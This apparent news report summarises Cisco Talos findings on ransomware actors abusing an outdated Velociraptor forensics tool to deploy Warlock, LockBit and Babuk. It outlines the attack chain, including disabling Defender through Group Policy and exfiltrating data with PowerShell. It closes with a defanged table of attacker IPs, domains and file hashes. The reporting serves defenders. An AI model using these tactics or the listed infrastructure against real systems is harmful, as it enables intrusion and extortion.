Security researchers at Cisco Talos have confirmed that ransomware operators are actively exploiting Velociraptor, an open-source digital forensics and incident response (DFIR) tool, in their attacks.
This marks the first definitive link between a legitimate security tool and a ransomware incident. The campaign, which deployed three separate ransomware strains, is attributed with moderate confidence to the threat actor Storm-2603.
The attack severely impacted the victim’s IT environment, encrypting VMware ESXi virtual machines and Windows servers using Warlock, LockBit, and Babuk ransomware.
Velociraptor is designed for security teams to perform endpoint monitoring and data collection, but in this campaign, it played a key role in helping the attackers maintain stealthy, persistent access.
After gaining initial entry, the threat actors installed an outdated version of Velociraptor (0.73.4.0), which is vulnerable to a privilege escalation flaw tracked as CVE-2025-6264.
This vulnerability can lead to arbitrary command execution and a complete takeover of the affected endpoint. The actors used this foothold to deploy LockBit and Babuk ransomware while remaining undetected.
This abuse of trusted security products aligns with a broader trend observed by Talos, where attackers increasingly leverage commercial and open-source tools to achieve their objectives.
Cisco Talos attributes this activity to Storm-2603, a suspected China-based group first identified in July 2025, exploiting SharePoint vulnerabilities known as ToolShell. The attribution is based on significant overlaps in tools and tactics.
Storm-2603 is known for deploying both Warlock and LockBit ransomware in the same attack, and while LockBit is common, the use of Warlock is a strong indicator, as it has been heavily used by this group since it appeared in June 2025.
The deployment of three distinct ransomware variants, Warlock, LockBit, and Babuk, in a single engagement is highly unusual and strengthens the connection to Storm-2603. However, the group had not previously been seen using Babuk, the combination of TTPs points in their direction.
A Multi-faceted Attack Chain
The attack, first detected in mid-August 2025, involved a sophisticated chain of events. After gaining what was likely initial access through the ToolShell exploit, the actor escalated privileges by creating new admin accounts and syncing them to Entra ID.
They used these accounts to access the VMware vSphere console, ensuring persistent control over the virtual environment.
To impair defenses, the attackers modified Active Directory Group Policy Objects (GPOs) to disable Microsoft Defender’s real-time protection and behavior monitoring.
A fileless PowerShell script carried out the final encryption on Windows machines, while a Linux binary of the Babuk encryptor targeted ESXi servers.
The attack also featured a double extortion component, with the actors using a custom PowerShell script to exfiltrate sensitive data before encryption, employing techniques to evade detection like suppressing progress indicators and using sleep commands to inhibit analysis.
| Indicator Type | Indicator Value |
|---|---|
| C2/Exfiltration IP | 65.38.121[.]226 |
| Malicious MSI Domain | stoaccinfoniqaveeambkp.blob.core.windows[.]net |
| Velociraptor C2 Server | velo.qaubctgg.workers[.]dev |
| Velociraptor Installer SHA256 | 649BDAA38E60EDE6D140BD54CA5412F1091186A803D3905465219053393F6421 |
| Velociraptor.exe SHA256 | 12F177290A299BAE8A363F47775FB99F305BBDD56BBDFDDB39595B43112F9FB7 |
| Malicious config.yaml SHA256 | A29125333AD72138D299CC9EF09718DDB417C3485F6B8FE05BA88A08BB0E5023 |
| In.exe (NTLM Downgrade Tool) SHA256 | C74897B1E986E2876873ABB3B5069BF1B103667F7F0E6B4581FBDA3FD647A74A |
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
